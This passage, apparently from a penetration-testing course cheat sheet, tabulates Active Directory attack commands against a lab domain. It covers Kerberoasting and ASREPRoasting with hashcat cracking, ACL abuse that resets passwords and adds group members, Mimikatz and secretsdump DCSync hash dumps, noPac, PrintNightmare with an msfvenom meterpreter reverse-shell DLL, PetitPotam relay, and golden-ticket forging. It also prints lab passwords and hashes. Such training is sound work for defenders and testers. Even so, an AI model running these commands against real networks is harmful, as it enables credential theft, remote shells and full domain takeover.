<td>Impacket tool used to download&#x2F;request (<code>-request</code>) all TGS tickets for offline processing from a Linux-based host.</td>
</tr>
<tr>
<td><code>GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request-user sqldev</code></td>
<td>Impacket tool used to download&#x2F;request (<code>-request-user</code>) a TGS ticket for a specific user account (<code>sqldev</code>) from a Linux-based host.</td>
</tr>
<tr>
<td><code>GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/mholliday -request-user sqldev -outputfile sqldev_tgs</code></td>
<td>Impacket tool used to download&#x2F;request a TGS ticket for a specific user account and write the ticket to a file (<code>-outputfile sqldev_tgs</code>) linux-based host.</td>
</tr>
<tr>
<td><code>hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt --force</code></td>
<td>Attempts to crack the Kerberos (<code>-m 13100</code>) ticket hash (<code>sqldev_tgs</code>) using <code>hashcat</code> and a wordlist (<code>rockyou.txt</code>) from a Linux-based host.</td>
</tr>
<tr>
<td><code>setspn.exe -Q */*</code></td>
<td>Used to enumerate <code>SPNs</code> in a target Windows domain from a Windows-based host.</td>
</tr>
<tr>
<td><code>Add-Type -AssemblyName System.IdentityModel  New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList &quot;MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433&quot;</code></td>
<td>PowerShell script used to download&#x2F;request the TGS ticket of a specific user from a Windows-based host.</td>
</tr>
<tr>
<td><code>setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String &#39;^CN&#39; -Context 0,1 | % &#123; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() &#125;</code></td>
<td>Used to download&#x2F;request all TGS tickets from a WIndows-based host.</td>
</tr>
<tr>
<td><code>mimikatz # base64 /out:true</code></td>
<td><code>Mimikatz</code> command that ensures TGS tickets are extracted in <code>base64</code> format from a Windows-based host.</td>
</tr>
<tr>
<td><code>kerberos::list /export </code></td>
<td><code>Mimikatz</code> command used to extract the TGS tickets from a Windows-based host.</td>
</tr>
<tr>
<td><code>echo &quot;&lt;base64 blob&gt;&quot; |  tr -d \\n </code></td>
<td>Used to prepare the base64 formatted TGS ticket for cracking from Linux-based host.</td>
</tr>
<tr>
<td><code>cat encoded_file | base64 -d &gt; sqldev.kirbi</code></td>
<td>Used to output a file (<code>encoded_file</code>) into a .kirbi file in base64 (<code>base64 -d &gt; sqldev.kirbi</code>) format from a Linux-based host.</td>
</tr>
<tr>
<td><code>python2.7 kirbi2john.py sqldev.kirbi</code></td>
<td>Used to extract the <code>Kerberos ticket</code>. This also creates a file called <code>crack_file</code> from a Linux-based host.</td>
</tr>
<tr>
<td><code>sed &#39;s/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/&#39; crack_file &gt; sqldev_tgs_hashcat</code></td>
<td>Used to modify the <code>crack_file</code> for <code>Hashcat</code> from a Linux-based host.</td>
</tr>
<tr>
<td><code>cat sqldev_tgs_hashcat </code></td>
<td>Used to view the prepared hash from a Linux-based host.</td>
</tr>
<tr>
<td><code>hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt </code></td>
<td>Used to crack the prepared Kerberos ticket hash (<code>sqldev_tgs_hashcat</code>) using a wordlist (<code>rockyou.txt</code>) from a Linux-based host.</td>
</tr>
<tr>
<td><code>Import-Module .\PowerView.ps1  Get-DomainUser * -spn | select samaccountname</code></td>
<td>Uses PowerView tool to extract <code>TGS Tickets</code> . Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat</code></td>
<td>PowerView tool used to download&#x2F;request the TGS ticket of a specific ticket and automatically format it for <code>Hashcat</code> from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation</code></td>
<td>Exports all TGS tickets to a <code>.CSV</code> file (<code>ilfreight_tgs.csv</code>) from a Windows-based host.</td>
</tr>
<tr>
<td><code>cat .\ilfreight_tgs.csv</code></td>
<td>Used to view the contents of the .csv file from a Windows-based host.</td>
</tr>
<tr>
<td><code>.\Rubeus.exe</code></td>
<td>Used to view the options and functionality possible with the tool <code>Rubeus</code>. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>.\Rubeus.exe kerberoast /stats</code></td>
<td>Used to check the kerberoast stats (<code>/stats</code>) within the target Windows domain from a Windows-based host.</td>
</tr>
<tr>
<td><code>.\Rubeus.exe kerberoast /ldapfilter:&#39;admincount=1&#39; /nowrap</code></td>
<td>Used to request&#x2F;download TGS tickets for accounts with the <code>admin</code> count set to <code>1</code> then formats the output in an easy to view &amp; crack manner (<code>/nowrap</code>) . Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>.\Rubeus.exe kerberoast /user:testspn /nowrap</code></td>
<td>Used to request&#x2F;download a TGS ticket for a specific user (<code>/user:testspn</code>) the formats the output in an easy to view &amp; crack manner (<code>/nowrap</code>). Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes</code></td>
<td>PowerView tool used to check the <code>msDS-SupportedEncryptionType</code> attribute associated with a specific user account (<code>testspn</code>). Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>hashcat -m 13100 rc4_to_crack /usr/share/wordlists/rockyou.txt</code></td>
<td>Used to attempt to crack the ticket hash using a wordlist (<code>rockyou.txt</code>) from a Linux-based host .</td>
</tr>
</tbody></table>
<h1 id="ACL-Enumeration-amp-Tactics"><a href="#ACL-Enumeration-amp-Tactics" class="headerlink" title="ACL Enumeration &amp; Tactics"></a>ACL Enumeration &amp; Tactics</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>Find-InterestingDomainAcl</code></td>
<td>PowerView tool used to find object ACLs in the target Windows domain with modification rights set to non-built in objects from a Windows-based host.</td>
</tr>
<tr>
<td><code>Import-Module .\PowerView.ps1  $sid = Convert-NameToSid wley</code></td>
<td>Used to import PowerView and retrieve the <code>SID</code> of a specific user account (<code>wley</code>) from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainObjectACL -Identity * | ? &#123;$_.SecurityIdentifier -eq $sid&#125;</code></td>
<td>Used to find all Windows domain objects that the user has rights over by mapping the user’s <code>SID</code> to the <code>SecurityIdentifier</code> property from a Windows-based host.</td>
</tr>
<tr>
<td><code>$guid= &quot;00299570-246d-11d0-a768-00aa006e0529&quot;   Get-ADObject -SearchBase &quot;CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)&quot; -Filter &#123;ObjectClass -like &#39;ControlAccessRight&#39;&#125; -Properties * | Select Name,DisplayName,DistinguishedName,rightsGuid | ?&#123;$_.rightsGuid -eq $guid&#125; | fl</code></td>
<td>Used to perform a reverse search &amp; map to a <code>GUID</code> value from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainObjectACL -ResolveGUIDs -Identity * | ? &#123;$_.SecurityIdentifier -eq $sid&#125; </code></td>
<td>Used to discover a domain object’s ACL by performing a search based on GUID’s (<code>-ResolveGUIDs</code>) from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName &gt; ad_users.txt</code></td>
<td>Used to discover a group of user accounts in a target Windows domain and add the output to a text file (<code>ad_users.txt</code>) from a Windows-based host.</td>
</tr>
<tr>
<td><code>foreach($line in [System.IO.File]::ReadLines(&quot;C:\Users\htb-student\Desktop\ad_users.txt&quot;)) &#123;get-acl  &quot;AD:\$(Get-ADUser $line)&quot; | Select-Object Path -ExpandProperty Access | Where-Object &#123;$_.IdentityReference -match &#39;INLANEFREIGHT\\wley&#39;&#125;&#125;</code></td>
<td>A <code>foreach loop</code> used to retrieve ACL information for each domain user in a target Windows domain by feeding each list of a text file(<code>ad_users.txt</code>) to the <code>Get-ADUser</code> cmdlet, then enumerates access rights of those users. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>$SecPassword = ConvertTo-SecureString &#39;&lt;PASSWORD HERE&gt;&#39; -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential(&#39;INLANEFREIGHT\wley&#39;, $SecPassword) </code></td>
<td>Used to create a <code>PSCredential Object</code> from a Windows-based host.</td>
</tr>
<tr>
<td><code>$damundsenPassword = ConvertTo-SecureString &#39;Pwn3d_by_ACLs!&#39; -AsPlainText -Force</code></td>
<td>Used to create a <code>SecureString Object</code> from a Windows-based host.</td>
</tr>
<tr>
<td><code>Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose</code></td>
<td>PowerView tool used to change the password of a specifc user (<code>damundsen</code>) on a target Windows domain from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-ADGroup -Identity &quot;Help Desk Level 1&quot; -Properties * | Select -ExpandProperty Members</code></td>
<td>PowerView tool used view the members of a target security group (<code>Help Desk Level 1</code>) from a Windows-based host.</td>
</tr>
<tr>
<td><code>Add-DomainGroupMember -Identity &#39;Help Desk Level 1&#39; -Members &#39;damundsen&#39; -Credential $Cred2 -Verbose</code></td>
<td>PowerView tool used to add a specifc user (<code>damundsen</code>) to a specific security group (<code>Help Desk Level 1</code>) in a target Windows domain from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainGroupMember -Identity &quot;Help Desk Level 1&quot; | Select MemberName</code></td>
<td>PowerView tool used to view the members of a specific security group (<code>Help Desk Level 1</code>) and output only the username of each member (<code>Select MemberName</code>) of the group from a Windows-based host.</td>
</tr>
<tr>
<td><code>Set-DomainObject -Credential $Cred2 -Identity adunn -SET @&#123;serviceprincipalname=&#39;notahacker/LEGIT&#39;&#125; -Verbose</code></td>
<td>PowerView tool used create a fake <code>Service Principal Name</code> given a sepecift user (<code>adunn</code>) from a Windows-based host.</td>
</tr>
<tr>
<td><code>Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose</code></td>
<td>PowerView tool used to remove the fake <code>Service Principal Name</code> created during the attack from a Windows-based host.</td>
</tr>
<tr>
<td><code>Remove-DomainGroupMember -Identity &quot;Help Desk Level 1&quot; -Members &#39;damundsen&#39; -Credential $Cred2 -Verbose</code></td>
<td>PowerView tool used to remove a specific user (<code>damundsent</code>) from a specific security group (<code>Help Desk Level 1</code>) from a Windows-based host.</td>
</tr>
<tr>
<td><code>ConvertFrom-SddlString</code></td>
<td>PowerShell cmd-let used to covert an <code>SDDL string</code> into a readable format. Performed from a Windows-based host.</td>
</tr>
</tbody></table>
<h1 id="DCSync"><a href="#DCSync" class="headerlink" title="DCSync"></a>DCSync</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>Get-DomainUser -Identity adunn  | select samaccountname,objectsid,memberof,useraccountcontrol |fl</code></td>
<td>PowerView tool used to view the group membership of a specific user (<code>adunn</code>) in a target Windows domain. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>$sid= &quot;S-1-5-21-3842939050-3880317879-2865463114-1164&quot; Get-ObjectAcl &quot;DC=inlanefreight,DC=local&quot; -ResolveGUIDs | ? &#123; ($_.ObjectAceType -match &#39;Replication-Get&#39;)&#125; | ?&#123;$_.SecurityIdentifier -match $sid&#125; | select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl</code></td>
<td>Used to create a variable called SID that is set equal to the SID of a user account. Then uses PowerView tool <code>Get-ObjectAcl</code> to check a specific user’s replication rights. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 -use-vss</code></td>
<td>Impacket tool sed to extract NTLM hashes from the NTDS.dit file hosted on a target Domain Controller (<code>172.16.5.5</code>) and save the extracted hashes to an file (<code>inlanefreight_hashes</code>). Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator</code></td>
<td>Uses <code>Mimikatz</code> to perform a <code>dcsync</code> attack from a Windows-based host.</td>
</tr>
</tbody></table>
<h1 id="Privileged-Access"><a href="#Privileged-Access" class="headerlink" title="Privileged Access"></a>Privileged Access</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName &quot;Remote Desktop Users&quot;</code></td>
<td>PowerView based tool to used to enumerate the <code>Remote Desktop Users</code> group on a Windows target (<code>-ComputerName ACADEMY-EA-MS01</code>) from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName &quot;Remote Management Users&quot;</code></td>
<td>PowerView based tool to used to enumerate the <code>Remote Management Users</code> group on a Windows target (<code>-ComputerName ACADEMY-EA-MS01</code>) from a Windows-based host.</td>
</tr>
<tr>
<td><code>$password = ConvertTo-SecureString &quot;Klmcargo2&quot; -AsPlainText -Force</code></td>
<td>Creates a variable (<code>$password</code>) set equal to the password (<code>Klmcargo2</code>) of a user from a Windows-based host.</td>
</tr>
<tr>
<td><code>$cred = new-object System.Management.Automation.PSCredential (&quot;INLANEFREIGHT\forend&quot;, $password)</code></td>
<td>Creates a variable (<code>$cred</code>) set equal to the username (<code>forend</code>) and password (<code>$password</code>) of a target domain account from a Windows-based host.</td>
</tr>
<tr>
<td><code>Enter-PSSession -ComputerName ACADEMY-EA-DB01 -Credential $cred</code></td>
<td>Uses the PowerShell cmd-let <code>Enter-PSSession</code> to establish a PowerShell session with a target over the network (<code>-ComputerName ACADEMY-EA-DB01</code>) from a Windows-based host. Authenticates using credentials made in the 2 commands shown prior (<code>$cred</code> &amp; <code>$password</code>).</td>
</tr>
<tr>
<td><code>evil-winrm -i 10.129.201.234 -u forend</code></td>
<td>Used to establish a PowerShell session with a Windows target from a Linux-based host using <code>WinRM</code>.</td>
</tr>
<tr>
<td><code>Import-Module .\PowerUpSQL.ps1</code></td>
<td>Used to import the <code>PowerUpSQL</code> tool.</td>
</tr>
<tr>
<td><code>Get-SQLInstanceDomain</code></td>
<td>PowerUpSQL tool used to enumerate SQL server instances from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-SQLQuery -Verbose -Instance &quot;172.16.5.150,1433&quot; -username &quot;inlanefreight\damundsen&quot; -password &quot;SQL1234!&quot; -query &#39;Select @@version&#39;</code></td>
<td>PowerUpSQL tool used to connect to connect to a SQL server and query the version (<code>-query &#39;Select @@version&#39;</code>) from a Windows-based host.</td>
</tr>
<tr>
<td><code>mssqlclient.py</code></td>
<td>Impacket tool used to display the functionality and options provided with <code>mssqlclient.py</code> from a Linux-based host.</td>
</tr>
<tr>
<td><code>mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth</code></td>
<td>Impacket tool used to connect to a MSSQL server from a Linux-based host.</td>
</tr>
<tr>
<td><code>SQL&gt; help</code></td>
<td>Used to display mssqlclient.py options once connected to a MSSQL server.</td>
</tr>
<tr>
<td><code>SQL&gt; enable_xp_cmdshell</code></td>
<td>Used to enable <code>xp_cmdshell stored procedure</code> that allows for executing OS commands via the database from a Linux-based host.</td>
</tr>
<tr>
<td><code>xp_cmdshell whoami /priv</code></td>
<td>Used to enumerate rights on a system using <code>xp_cmdshell</code>.</td>
</tr>
</tbody></table>
<h1 id="NoPac"><a href="#NoPac" class="headerlink" title="NoPac"></a>NoPac</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>sudo git clone https://github.com/Ridter/noPac.git</code></td>
<td>Used to clone a <code>noPac</code> exploit using git. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap</code></td>
<td>Runs <code>scanner.py</code> to check if a target system is vulnerable to <code>noPac</code>&#x2F;<code>Sam_The_Admin</code> from a Linux-based host.</td>
</tr>
<tr>
<td><code>sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap</code></td>
<td>Used to exploit the <code>noPac</code>&#x2F;<code>Sam_The_Admin</code>  vulnerability and gain a SYSTEM shell (<code>-shell</code>). Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator</code></td>
<td>Used to exploit the <code>noPac</code>&#x2F;<code>Sam_The_Admin</code>  vulnerability and perform a <code>DCSync</code> attack against the built-in Administrator account on a Domain Controller from a Linux-based host.</td>
</tr>
</tbody></table>
<h1 id="PrintNightmare"><a href="#PrintNightmare" class="headerlink" title="PrintNightmare"></a>PrintNightmare</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>git clone https://github.com/cube0x0/CVE-2021-1675.git</code></td>
<td>Used to clone a PrintNightmare exploit  using git from a Linux-based host.</td>
</tr>
<tr>
<td><code>pip3 uninstall impacket git clone https://github.com/cube0x0/impacket cd impacket python3 ./setup.py install</code></td>
<td>Used to ensure the exploit author’s (<code>cube0x0</code>) version of Impacket is installed. This also uninstalls any previous Impacket version on a Linux-based host.</td>
</tr>
<tr>
<td><code>rpcdump.py @172.16.5.5 | egrep &#39;MS-RPRN|MS-PAR&#39;</code></td>
<td>Used to check if a Windows target has <code>MS-PAR</code> &amp; <code>MSRPRN</code> exposed from a Linux-based host.</td>
</tr>
<tr>
<td><code>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.129.202.111 LPORT=8080 -f dll &gt; backupscript.dll</code></td>
<td>Used to generate a DLL payload to be used by the exploit to gain a shell session. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>sudo smbserver.py -smb2support CompData /path/to/backupscript.dll</code></td>
<td>Used to create an SMB server and host a shared folder (<code>CompData</code>) at the specified location on the local linux host. This can be used to host the DLL payload that the exploit will attempt to download to the host. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>sudo python3 CVE-2021-1675.py inlanefreight.local/&lt;username&gt;:&lt;password&gt;@172.16.5.5 &#39;\\10.129.202.111\CompData\backupscript.dll&#39;</code></td>
<td>Executes the exploit and specifies the location of the DLL payload. Performed from a Linux-based host.</td>
</tr>
</tbody></table>
<h1 id="PetitPotam"><a href="#PetitPotam" class="headerlink" title="PetitPotam"></a>PetitPotam</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController</code></td>
<td>Impacket tool used to create an <code>NTLM relay</code> by specifiying the web enrollment URL for the <code>Certificate Authority</code> host. Perfomred from a Linux-based host.</td>
</tr>
<tr>
<td><code>git clone https://github.com/topotam/PetitPotam.git</code></td>
<td>Used to clone the <code>PetitPotam</code> exploit using git. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>python3 PetitPotam.py 172.16.5.225 172.16.5.5</code></td>
<td>Used to execute the PetitPotam exploit by  specifying the IP address of the attack host (<code>172.16.5.255</code>) and the target Domain Controller (<code>172.16.5.5</code>). Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 &lt;base64 certificate&gt; = dc01.ccache</code></td>
<td>Uses <code>gettgtpkinit</code>.py to request a TGT ticket for the Domain Controller (<code>dc01.ccache</code>) from a Linux-based host.</td>
</tr>
<tr>
<td><code>secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass &quot;ACADEMY-EA-DC01$&quot;@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL</code></td>
<td>Impacket tool used to perform a DCSync attack and retrieve one or all of the <code>NTLM password hashes</code> from the target Windows domain. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>klist</code></td>
<td><code>krb5-user</code> command used to view the contents of the <code>ccache</code> file. Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$</code></td>
<td>Used to submit TGS requests using <code>getnthash.py</code> from a Linux-based host.</td>
</tr>
<tr>
<td><code>secretsdump.py -just-dc-user INLANEFREIGHT/administrator &quot;ACADEMY-EA-DC01$&quot;@172.16.5.5 -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba</code></td>
<td>Impacket tool used to extract hashes from <code>NTDS.dit</code> using a <code>DCSync attack</code> and a captured hash (<code>-hashes</code>). Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /&lt;base64 certificate&gt;=/ptt</code></td>
<td>Uses Rubeus to request a TGT and perform a <code>pass-the-ticket attack</code> using the machine account (<code>/user:ACADEMY-EA-DC01$</code>) of a Windows target. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt</code></td>
<td>Performs a DCSync attack using <code>Mimikatz</code>. Performed from a Windows-based host.</td>
</tr>
</tbody></table>
<h1 id="Miscellaneous-Misconfigurations"><a href="#Miscellaneous-Misconfigurations" class="headerlink" title="Miscellaneous Misconfigurations"></a>Miscellaneous Misconfigurations</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>Import-Module .\SecurityAssessment.ps1</code></td>
<td>Used to import the module <code>Security Assessment.ps1</code>. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL</code></td>
<td>SecurityAssessment.ps1 based tool used to enumerate a Windows target for <code>MS-PRN Printer bug</code>. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>adidnsdump -u inlanefreight\\forend ldap://172.16.5.5</code></td>
<td>Used to resolve all records in a DNS zone over <code>LDAP</code> from a Linux-based host.</td>
</tr>
<tr>
<td><code>adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r</code></td>
<td>Used to resolve unknown records in a DNS zone by performing an <code>A query</code> (<code>-r</code>) from a Linux-based host.</td>
</tr>
<tr>
<td><code>Get-DomainUser * | Select-Object samaccountname,description </code></td>
<td>PowerView tool used to display the description field of select objects (<code>Select-Object</code>) on a target Windows domain from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol</code></td>
<td>PowerView tool used to check for the <code>PASSWD_NOTREQD</code> setting of select objects (<code>Select-Object</code>) on a target Windows domain from a Windows-based host.</td>
</tr>
<tr>
<td><code>ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts</code></td>
<td>Used to list the contents of a share hosted on a Windows target from the context of a currently logged on user. Performed from a Windows-based host.</td>
</tr>
</tbody></table>
<h1 id="Group-Policy-Enumeration-amp-Attacks"><a href="#Group-Policy-Enumeration-amp-Attacks" class="headerlink" title="Group Policy Enumeration &amp; Attacks"></a>Group Policy Enumeration &amp; Attacks</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE</code></td>
<td>Tool used to decrypt a captured <code>group policy preference password</code> from a Linux-based host.</td>
</tr>
<tr>
<td><code>crackmapexec smb -L | grep gpp</code></td>
<td>Locates and retrieves a <code>group policy preference password</code> using <code>CrackMapExec</code>, the filters the output using <code>grep</code>. Peformed from a Linux-based host.</td>
</tr>
<tr>
<td><code>crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin</code></td>
<td>Locates and retrieves any credentials stored in the <code>SYSVOL</code> share of a Windows target using <code>CrackMapExec</code> from a Linux-based host.</td>
</tr>
<tr>
<td><code>Get-DomainGPO | select displayname</code></td>
<td>PowerView tool used to enumerate GPO names in a target Windows domain from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-GPO -All | Select DisplayName</code></td>
<td>PowerShell cmd-let used to enumerate GPO names. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>$sid=Convert-NameToSid &quot;Domain Users&quot; </code></td>
<td>Creates a variable called <code>$sid</code> that is set equal to the <code>Convert-NameToSid</code> tool and specifies the group account <code>Domain Users</code>. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainGPO | Get-ObjectAcl | ?&#123;$_.SecurityIdentifier -eq $sid</code></td>
<td>PowerView tool that is used to check if the <code>Domain Users</code>  (<code>eq $sid</code>) group has any rights over one or more GPOs. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532</code></td>
<td>PowerShell cmd-let used to display the name of a GPO given a <code>GUID</code>. Performed from a Windows-based host.</td>
</tr>
</tbody></table>
<h1 id="ASREPRoasting"><a href="#ASREPRoasting" class="headerlink" title="ASREPRoasting"></a>ASREPRoasting</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl</code></td>
<td>PowerView based tool used to search for the <code>DONT_REQ_PREAUTH</code> value across in user accounts in a target Windows domain. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat</code></td>
<td>Uses <code>Rubeus</code> to perform an <code>ASEP Roasting attack</code> and formats the output for <code>Hashcat</code>. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt </code></td>
<td>Uses <code>Hashcat</code> to attempt to crack the captured hash using a wordlist (<code>rockyou.txt</code>). Performed from a Linux-based host.</td>
</tr>
<tr>
<td><code>kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt </code></td>
<td>Enumerates users in a target Windows domain and automatically retrieves the <code>AS</code> for any users found that don’t require Kerberos pre-authentication. Performed from a Linux-based host.</td>
</tr>
</tbody></table>
<h1 id="Trust-Relationships-Child-gt-Parent-Trusts"><a href="#Trust-Relationships-Child-gt-Parent-Trusts" class="headerlink" title="Trust Relationships - Child &gt; Parent Trusts"></a>Trust Relationships - Child &gt; Parent Trusts</h1><table>
<thead>
<tr>
<th>Command</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><code>Import-Module activedirectory</code></td>
<td>Used to import the <code>Active Directory</code> module. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-ADTrust -Filter *</code></td>
<td>PowerShell cmd-let used to enumerate a target Windows domain’s trust relationships. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainTrust </code></td>
<td>PowerView tool used to enumerate a target Windows domain’s trust relationships. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainTrustMapping</code></td>
<td>PowerView tool used to perform a domain trust mapping from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName</code></td>
<td>PowerView tools used to enumerate users in a target child domain from a Windows-based host.</td>
</tr>
<tr>
<td><code>mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt</code></td>
<td>Uses Mimikatz to obtain the <code>KRBTGT</code> account’s <code>NT Hash</code> from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainSID</code></td>
<td>PowerView tool used to get the SID for a target child domain from a Windows-based host.</td>
</tr>
<tr>
<td><code>Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity &quot;Enterprise Admins&quot; | select distinguishedname,objectsid</code></td>
<td>PowerView tool used to obtain the <code>Enterprise Admins</code> group’s SID from a Windows-based host.</td>
</tr>
<tr>
<td><code>ls \\academy-ea-dc01.inlanefreight.local\c$</code></td>
<td>Used to attempt to list the contents of the C drive on a target Domain Controller. Performed from a Windows-based host.</td>
</tr>
<tr>
<td><code>mimikatz # kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt</code></td>
<td>Uses <code>Mimikatz</code> to create a <code>Golden Ticket</code> from a Windows-based host .</td>
</tr>
<tr>
<td><code>.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689  /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt</code></td>
<td>Uses <code>Rubeus</code> to create a <code>Golden Ticket</code> from a Windows-based host.</td>
</tr>
<tr>
